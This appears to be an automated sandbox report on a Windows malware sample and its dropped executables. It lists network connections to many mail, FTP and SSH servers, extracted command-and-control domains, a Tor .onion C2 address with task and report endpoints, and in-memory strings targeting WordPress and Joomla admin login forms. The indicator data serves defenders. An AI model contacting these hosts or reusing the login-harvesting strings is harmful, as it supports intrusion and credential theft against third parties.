                                Source: unknownHTTPS traffic detected: 89.161.228.119:443 -> 192.168.2.4:54244 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 193.163.77.6:443 -> 192.168.2.4:54382 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 193.163.77.6:443 -> 192.168.2.4:54383 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.130.200:443 -> 192.168.2.4:54452 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 164.46.121.63:443 -> 192.168.2.4:54412 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.130.200:443 -> 192.168.2.4:54462 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 164.46.121.63:443 -> 192.168.2.4:54416 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.107:443 -> 192.168.2.4:54113 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.14:443 -> 192.168.2.4:54364 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.81:443 -> 192.168.2.4:54446 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.81:443 -> 192.168.2.4:54448 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:54442 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 66.97.32.25:443 -> 192.168.2.4:54471 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.40:443 -> 192.168.2.4:54513 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54657 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54661 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54670 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54667 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54664 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 178.238.43.210:443 -> 192.168.2.4:54762 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 178.238.43.210:443 -> 192.168.2.4:54759 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.3:443 -> 192.168.2.4:54794 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:54782 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:54793 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:54905 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:54907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.152.228:443 -> 192.168.2.4:55456 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:55531 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 35.190.10.69:443 -> 192.168.2.4:55491 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 217.26.54.21:443 -> 192.168.2.4:55596 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:55667 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:55689 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:55771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:55772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:55770 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:55700 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:55688 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.43.104.145:443 -> 192.168.2.4:55683 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 66.97.32.25:443 -> 192.168.2.4:55802 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:55801 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:55942 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:55943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.161.228.119:443 -> 192.168.2.4:55944 version: TLS 1.2
                                Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\A\18\s\PCbuild\amd64\_bz2.pdb source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\wifiv.pdb source: ZRgv8wdMtR.exe, 00000000.00000002.1710750264.0000000000423000.00000002.00000001.01000000.00000003.sdmp, ZRgv8wdMtR.exe, 00000000.00000000.1639926914.0000000000423000.00000002.00000001.01000000.00000003.sdmp, wesswwi, 00000003.00000002.1951101538.0000000000423000.00000002.00000001.01000000.00000005.sdmp, wesswwi, 00000003.00000000.1895196881.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: FNC:\wifiv.pdb source: ZRgv8wdMtR.exe, 00000000.00000002.1710750264.0000000000423000.00000002.00000001.01000000.00000003.sdmp, ZRgv8wdMtR.exe, 00000000.00000000.1639926914.0000000000423000.00000002.00000001.01000000.00000003.sdmp, wesswwi, 00000003.00000002.1951101538.0000000000423000.00000002.00000001.01000000.00000005.sdmp, wesswwi, 00000003.00000000.1895196881.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: vcruntime140.amd64.pdbGCTL source: A19A.exe, 00000008.00000003.2025757354.00000208D2DEC000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Unable to locate the .pdb file in this location source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: The module signature does not match with .pdb signature. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: .pdb.dbg source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: '(EfiGuardDxe.pdbx source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\huc.pdb source: 8F78.exe, 00000006.00000000.1985139103.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, 8F78.exe, 00000006.00000002.1999183103.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, 8F78.exe, 00000007.00000000.1994994262.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, csrss.exe, 00000013.00000000.2184388498.00000000005C7000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: or you do not have access permission to the .pdb location. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: EfiGuardDxe.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: vcruntime140.amd64.pdb source: A19A.exe, 00000008.00000003.2025757354.00000208D2DEC000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dbghelp.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: dbghelp.pdbGCTL source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B509E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF6E1B509E4
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B46744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,8_2_00007FF6E1B46744
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B37850 FindFirstFileExW,FindClose,8_2_00007FF6E1B37850
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B46744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,8_2_00007FF6E1B46744
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\Temp\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI64322\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\AppData\
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeFile opened: C:\Users\user\
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 4x nop then jmp 092911BEh11_2_09290A10
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 4x nop then jmp 09292F66h11_2_09292D30
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 4x nop then jmp 09293E58h11_2_09293A7A
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 4x nop then jmp 09293E58h11_2_09293A88

                                Networking

                                barindex
                                Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.94.245.237:80 -> 192.168.2.4:49734
                                Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 104.198.2.251:80 -> 192.168.2.4:49735
                                Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.143.166.163:80 -> 192.168.2.4:49736
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.46.59 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 34.143.166.163 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.198.2.251 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.45.142 443Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 211.168.53.110 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 34.94.245.237 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.88.149 443Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 2.180.10.7 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 180.94.156.61 80Jump to behavior
                                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 91.215.85.17 80
                                Source: Malware configuration extractorURLs: dayfarrichjwclik.fun
                                Source: Malware configuration extractorURLs: neighborhoodfeelsa.fun
                                Source: Malware configuration extractorURLs: ratefacilityframw.fun
                                Source: Malware configuration extractorURLs: reviveincapablewew.pw
                                Source: Malware configuration extractorURLs: cakecoldsplurgrewe.pw
                                Source: Malware configuration extractorURLs: opposesicknessopw.pw
                                Source: Malware configuration extractorURLs: politefrightenpowoa.pw
                                Source: Malware configuration extractorURLs: http://snukerukeutit.org/
                                Source: Malware configuration extractorURLs: http://lightseinsteniki.org/
                                Source: Malware configuration extractorURLs: http://tyiuiunuewqy.org/
                                Source: Malware configuration extractorURLs: http://liuliuoumumy.org/
                                Source: Malware configuration extractorURLs: http://tonimiuyaytre.org/
                                Source: global trafficTCP traffic: 68.233.46.109 ports 22,143,220,110,1,2,443,465,995,2222,80,21
                                Source: global trafficTCP traffic: 185.65.223.6 ports 143,465,4,5,995,6
                                Source: global trafficTCP traffic: 62.168.119.84 ports 143,220,110,1,3,465,4,995
                                Source: global trafficTCP traffic: 46.229.230.4 ports 22,2,222,443,80,21
                                Source: global trafficTCP traffic: 34.205.242.146 ports 22,143,2,465,995,21
                                Source: global trafficTCP traffic: 46.229.230.81 ports 22,3,443,4,80,21
                                Source: global trafficTCP traffic: 216.230.254.4 ports 143,1,3,465,4,587,995
                                Source: global trafficTCP traffic: 89.46.109.48 ports 22,990,2,222,443,2222,80,21
                                Source: global trafficTCP traffic: 77.93.220.102 ports 143,1,3,465,4,587,995
                                Source: global trafficTCP traffic: 103.19.26.39 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 50.116.86.49 ports 22,143,2525,2,443,465,995,80,21
                                Source: global trafficTCP traffic: 81.0.206.104 ports 22,3,443,4,80,21
                                Source: global trafficTCP traffic: 15.197.142.173 ports 22,143,2,222,443,465,995,80,21
                                Source: global trafficTCP traffic: 86.107.32.130 ports 22,2525,2,443,995,80,21
                                Source: global trafficTCP traffic: 46.229.230.21 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 62.109.151.15 ports 22,1,2,443,80,21
                                Source: global trafficTCP traffic: 186.202.4.42 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 141.98.102.194 ports 22,143,990,1,2,222,443,465,995,80,21
                                Source: global trafficTCP traffic: 62.149.128.72 ports 143,1,3,465,993,4,587,995
                                Source: global trafficTCP traffic: 217.26.54.21 ports 22,3,443,4,80,21
                                Source: global trafficTCP traffic: 64.190.63.111 ports 22,1,2,443,80,21
                                Source: global trafficTCP traffic: 103.168.172.219 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 103.168.172.218 ports 143,465,4,5,995,6
                                Source: global trafficTCP traffic: 89.161.228.119 ports 22,143,2,443,80,21
                                Source: global trafficTCP traffic: 185.32.160.10 ports 22,3,443,4,80,21
                                Source: global trafficTCP traffic: 103.168.172.221 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 103.168.172.220 ports 143,465,4,5,995,6
                                Source: global trafficTCP traffic: 35.190.10.69 ports 22,143,2,443,465,995,2222,80,21
                                Source: global trafficTCP traffic: 62.109.128.119 ports 143,110,1,3,465,4,995
                                Source: global trafficTCP traffic: 164.46.93.189 ports 22,143,3,443,465,4,587,995,80,21
                                Source: global trafficTCP traffic: 217.61.3.26 ports 143,1,2525,3,465,4,995
                                Source: global trafficTCP traffic: 3.33.152.147 ports 22,143,1,2,465,995,21
                                Source: global trafficTCP traffic: 92.240.253.136 ports 143,465,4,5,995,6
                                Source: global trafficTCP traffic: 93.184.77.232 ports 143,220,1,3,465,4,995
                                Source: global trafficTCP traffic: 162.43.104.145 ports 22,143,2,443,465,993,587,995,80,21
                                Source: global trafficTCP traffic: 85.248.129.35 ports 22,990,3,443,4,80,21
                                Source: global trafficTCP traffic: 37.9.169.112 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 54.161.222.85 ports 22,143,2,443,465,995,80,21
                                Source: global trafficTCP traffic: 164.46.121.63 ports 22,143,2,443,465,995,80,21
                                Source: global trafficTCP traffic: 92.240.253.3 ports 22,3,443,4,80,21
                                Source: global trafficTCP traffic: 104.47.17.74 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 83.167.249.7 ports 22,990,3,443,4,80,21
                                Source: global trafficTCP traffic: 59.106.13.82 ports 22,143,110,3,443,465,4,995,80,21
                                Source: global trafficTCP traffic: 45.13.137.8 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 66.97.32.25 ports 22,25,143,2,443,465,995,80,21
                                Source: global trafficTCP traffic: 217.26.49.139 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 89.46.109.20 ports 22,2525,2,443,80,21
                                Source: global trafficTCP traffic: 45.13.137.7 ports 143,220,993,465,4,5,995,6
                                Source: global trafficTCP traffic: 173.255.193.246 ports 143,1,3,465,4,995
                                Source: global trafficTCP traffic: 212.227.15.41 ports 143,1,3,465,4,587,995
                                Source: global trafficTCP traffic: 217.160.223.67 ports 22,1,2,443,80,21
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
                                Source: 8F78.exe, 00000007.00000002.3640005281.00000000036E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/hb.php?n=46B91F4394C2601A5E95&i=1239200
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s-kotobuki-s.co.jp/administrator/k4mmfco6oqxsqd.onion
                                Source: httpHTTP: ericrothphoto.com/phpmyadmin
                                Source: httpHTTP: ericrothphoto.com/phpmyadmin
                                Source: unknownDNS traffic detected: query: piaggio-bratislava.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: straznyanjel.sk replaycode: Server failure (2)
                                Source: unknownDNS traffic detected: query: ftp.clickbkk.com replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ivory.plala.co.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: khi-ho.ne.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: dobrybicykel.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: nippondotech.co.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: konic.co.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ftp.gabio.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: mail.feio.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: pop3.kingsway-hk.com replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ftp.feio.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ftp.konic.co.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: mail.dobrybicykel.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: dayfarrichjwclik.fun replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: eluxviaggi.com replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: mail.daxter.fsnet.co.uk replaycode: Server failure (2)
                                Source: unknownDNS traffic detected: query: merlynsociety.com replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: mail.straznyanjel.sk replaycode: Server failure (2)
                                Source: unknownDNS traffic detected: query: imap.escolapatelli.com.br replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: imap.emr.com.ar replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: mailgate.elteconline.com replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ssh.e-art-studio.co.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: onualituyrs.org replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: daxter.fsnet.co.uk replaycode: Server failure (2)
                                Source: unknownDNS traffic detected: query: spona-na-ponozky.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: gryffindorhouse.co.uk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: gabio.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: smtp.brightright.com replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: enp.ericsson.se replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: aquamat-liptov.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ftp.khi-ho.ne.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: animekingdom.net replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: feio.jp replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ftp.daxter.fsnet.co.uk replaycode: Server failure (2)
                                Source: unknownDNS traffic detected: query: clickbkk.com replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ftp.dobrybicykel.sk replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: ssh.kingsway-hk.com replaycode: Name error (3)
                                Source: unknownNetwork traffic detected: DNS query count 182
                                Source: unknownNetwork traffic detected: IP country count 17
                                Source: global trafficTCP traffic: 192.168.2.4:49741 -> 194.55.13.50:9001
                                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 47.254.134.152:9001
                                Source: global trafficTCP traffic: 192.168.2.4:49743 -> 87.118.96.154:9001
                                Source: global trafficTCP traffic: 192.168.2.4:49744 -> 148.251.46.115:9001
                                Source: global trafficTCP traffic: 192.168.2.4:49745 -> 94.23.121.150:9001
                                Source: global trafficTCP traffic: 192.168.2.4:49747 -> 38.47.221.193:34368
                                Source: global trafficTCP traffic: 192.168.2.4:49763 -> 185.22.174.119:9001
                                Source: global trafficTCP traffic: 192.168.2.4:51802 -> 37.9.169.112:143
                                Source: global trafficTCP traffic: 192.168.2.4:52934 -> 173.255.193.246:143
                                Source: global trafficTCP traffic: 192.168.2.4:52941 -> 216.230.254.4:143
                                Source: global trafficTCP traffic: 192.168.2.4:52964 -> 212.227.15.41:143
                                Source: global trafficTCP traffic: 192.168.2.4:52970 -> 103.168.172.219:143
                                Source: global trafficTCP traffic: 192.168.2.4:53878 -> 162.43.104.145:995
                                Source: global trafficTCP traffic: 192.168.2.4:53916 -> 59.106.13.82:143
                                Source: global trafficTCP traffic: 192.168.2.4:53953 -> 35.190.10.69:143
                                Source: global trafficTCP traffic: 192.168.2.4:53956 -> 15.197.142.173:143
                                Source: global trafficTCP traffic: 192.168.2.4:53982 -> 89.46.109.20:2525
                                Source: global trafficTCP traffic: 192.168.2.4:54123 -> 186.202.4.42:143
                                Source: global trafficTCP traffic: 192.168.2.4:54204 -> 46.229.230.21:143
                                Source: global trafficTCP traffic: 192.168.2.4:54247 -> 92.240.253.136:995
                                Source: global trafficTCP traffic: 192.168.2.4:54273 -> 54.161.222.85:143
                                Source: global trafficTCP traffic: 192.168.2.4:54298 -> 157.205.8.22:143
                                Source: global trafficTCP traffic: 192.168.2.4:54312 -> 217.26.49.139:143
                                Source: global trafficTCP traffic: 192.168.2.4:54321 -> 68.233.46.109:143
                                Source: global trafficTCP traffic: 192.168.2.4:54326 -> 103.168.172.221:143
                                Source: global trafficTCP traffic: 192.168.2.4:54342 -> 93.184.77.232:143
                                Source: global trafficTCP traffic: 192.168.2.4:54366 -> 45.13.137.8:143
                                Source: global trafficTCP traffic: 192.168.2.4:54417 -> 141.98.102.194:143
                                Source: global trafficTCP traffic: 192.168.2.4:54435 -> 62.168.119.84:143
                                Source: global trafficTCP traffic: 192.168.2.4:54475 -> 185.65.223.6:995
                                Source: global trafficTCP traffic: 192.168.2.4:54477 -> 77.93.220.102:143
                                Source: global trafficTCP traffic: 192.168.2.4:54483 -> 217.61.3.26:143
                                Source: global trafficTCP traffic: 192.168.2.4:54489 -> 45.13.137.7:143
                                Source: global trafficTCP traffic: 192.168.2.4:54496 -> 62.149.128.72:143
                                Source: global trafficTCP traffic: 192.168.2.4:54521 -> 62.109.128.119:143
                                Source: global trafficTCP traffic: 192.168.2.4:54532 -> 89.161.228.119:143
                                Source: global trafficTCP traffic: 192.168.2.4:54544 -> 178.238.40.161:995
                                Source: global trafficTCP traffic: 192.168.2.4:54616 -> 103.19.26.39:143
                                Source: global trafficTCP traffic: 192.168.2.4:54620 -> 62.149.128.160:143
                                Source: global trafficTCP traffic: 192.168.2.4:54690 -> 66.97.32.25:143
                                Source: global trafficTCP traffic: 192.168.2.4:54777 -> 62.149.128.157:143
                                Source: global trafficTCP traffic: 192.168.2.4:54885 -> 103.168.172.216:995
                                Source: global trafficTCP traffic: 192.168.2.4:54932 -> 3.33.152.147:995
                                Source: global trafficTCP traffic: 192.168.2.4:54989 -> 34.205.242.146:143
                                Source: global trafficTCP traffic: 192.168.2.4:55036 -> 85.248.129.36:587
                                Source: global trafficTCP traffic: 192.168.2.4:55037 -> 37.9.175.8:220
                                Source: global trafficTCP traffic: 192.168.2.4:55039 -> 104.47.17.74:143
                                Source: global trafficTCP traffic: 192.168.2.4:55047 -> 83.167.249.7:990
                                Source: global trafficTCP traffic: 192.168.2.4:55262 -> 164.46.121.63:143
                                Source: global trafficTCP traffic: 192.168.2.4:55283 -> 37.9.169.113:995
                                Source: global trafficTCP traffic: 192.168.2.4:55342 -> 62.149.128.163:143
                                Source: global trafficTCP traffic: 192.168.2.4:55411 -> 50.116.86.49:143
                                Source: global trafficTCP traffic: 192.168.2.4:55515 -> 103.168.172.218:143
                                Source: global trafficTCP traffic: 192.168.2.4:55589 -> 164.46.93.189:143
                                Source: global trafficTCP traffic: 192.168.2.4:55668 -> 85.248.129.35:990
                                Source: global trafficTCP traffic: 192.168.2.4:55743 -> 103.168.172.220:143
                                Source: global trafficTCP traffic: 192.168.2.4:55808 -> 103.168.172.217:995
                                Source: global trafficTCP traffic: 192.168.2.4:55823 -> 62.149.128.74:143
                                Source: global trafficTCP traffic: 192.168.2.4:55824 -> 62.149.128.154:143
                                Source: global trafficTCP traffic: 192.168.2.4:56114 -> 95.216.227.177:2023
                                Source: global trafficTCP traffic: 192.168.2.4:59410 -> 89.46.109.48:222
                                Source: global trafficTCP traffic: 192.168.2.4:59414 -> 46.229.230.40:222
                                Source: global trafficTCP traffic: 192.168.2.4:59426 -> 86.107.32.130:995
                                Source: global trafficTCP traffic: 192.168.2.4:59457 -> 46.229.230.4:222
